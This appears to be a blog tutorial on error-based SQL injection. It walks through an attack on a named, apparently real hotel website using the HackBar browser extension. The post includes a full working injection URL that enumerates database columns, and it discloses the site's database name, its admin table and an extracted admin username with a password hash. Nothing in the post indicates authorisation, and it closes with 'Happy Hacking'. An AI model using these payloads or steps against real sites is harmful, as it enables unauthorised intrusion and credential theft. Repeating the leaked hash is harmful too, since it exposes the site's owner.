Open in app

Sign in

Write

Sign in

Error Based SQL Injection

Auntor Acharja
3 min readSep 21, 2020

--

We mainly use ​error base SQL injection​ when we do not access any website admin by manual SQL injection or WAF Bypass.

I recommend using Firefox Hackebar extension for Error base SQL injection, There is a part in ​hackbar ​like ERROR/DOUBLE .it will make our error base SQL injection procedure easier.

Our target site is: ​http://www.embryohotel.com/room-detail.php?id=11

Step 1​: First add string(‘) to check is the site is vulnerable or not. My target site is Vulnerable because using the sting the content of the page is changed and it shows some message.

Step2​: No following manual SQL injection or Union base SQL injection try to find out a vulnerable column. In my target site, it shows an error message.

Step 3​: Let's try WAF Bypass, but in my target site, its also not work. So we need to use Error base SQL infection.

Step4​: We need to find out the database name, So click this way in firefox hackbar extension,

ERROR/DOUBLE -> Error Based -> Get Database

We get the Database name: cp227754_embryohotel_db

Step 5​: find out the admin/required Table, So click this way in firefox hackbar extension,

ERROR/DOUBLE -> Error Based -> Get Tables

We get the Table name: admin

Step 6​: find out the Columns,So click this way in firefox hackbar extension, ERROR/DOUBLE -> Error Based -> Get Columns

We get the Column name: username, password

Note: if there are multiple columns then change the limit and re-run , then it will also show the different columns. Like: http://www.embryohotel.com/room-detail.php?id=-11+AND+​(SELECT+1+FROM+(SELECT+C OUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+I NFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e+AND+table_sche ma=0x63703232373735345f656d6272796f686f74656c5f6462+​LIMIT+1,1​),FLOOR(RAND(0)* 2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) — —

Increment 1,2,3,4…….

Step 7​: Now find out data from this two-column(username, password) ,So click this way in firefox hackbar extension,

​ ​ERROR/DOUBLE -> Error Based -> XPATH EXTRACTVALUE ->Get Data

We get admin username and password(hashed):

admin => e742c63f03ab602f2b38433ffc

— — — — — — — — — — — -Happy Hacking — — — — — — — — — —

Ethical Hacking
Sql Injection
Vulnerability
Cybersecurity
Sql

--

--

Auntor Acharja

Written by Auntor Acharja

29 Followers

Software QA Engineer || Test Automation Engineer

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams